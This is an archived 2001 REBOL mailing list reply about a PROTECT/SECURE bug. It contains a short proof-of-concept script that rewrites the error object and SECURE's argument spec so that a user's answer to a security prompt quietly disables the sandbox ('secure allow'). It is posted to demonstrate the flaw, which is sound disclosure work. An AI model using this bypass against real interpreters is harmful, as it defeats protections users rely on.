Mailing list home
  Find posts   Help

Latest messageRecent messages

In this thread:
 First
 Prev
 Next
 See whole thread
By msg id:
 Prev: 12 Dec 2001 6:04
 Next: 12 Dec 2001 18:26

Other threads:
 Prev: Cacheserver
 Next: It's been about ...

Same author:
 Prev: 11 Dec 2001 18:47
 Next: 13 Dec 2001 11:55

 Random message

Indexes:
 By topic
 By date
 By author
 By subject
Join the Mailing List....
AccessibilityAbout / FAQ
Member's loungeContact/FeedbackOther REBOL links
Membership:
member name

password

Remember?

Not a member? Please join
27-Jul 0:04 UTC
[0.048] 9.134k
Mailing List Archive: 49091 messages
  • Home
  • Script library
  • AltME Archive
  • Mailing list
  • Articles Index
  • Site search
 

[REBOL] Re: PROTECT bug

From: lmecir:mbox:vol:cz at: 12-Dec-2001 8:53


Hi Volker,

I will describe what is the script doing. I just wanted to prove, that if
you allow a malicious script to change something, you cannot rely on e.g.
SECURE (or any other function or native). If you normally do

    secure throw

, you know what you will get if you answer yes to the question [Yes, allow
all, no, or quit? (Y/A/N/Q)]. If you do it after my modification, it will
behave differently.

Cheers
    Ladislav

malicious-script: [
    system/error/script/type: ""
    system/error/script/expect-arg: [
        (
            change pick third :secure 3 reduce [word! block!]
            secure allow
            ("I love you")
        )
    ]
    change pick third :secure 3 reduce [unset! none!]
]

Usage:

protect 'secure
print "virus alert!"
do malicious-script
secure throw

1 · 2 · 3 · 4 · 5 ... 8 · 9 · 10 · [11] · 12 · See whole thread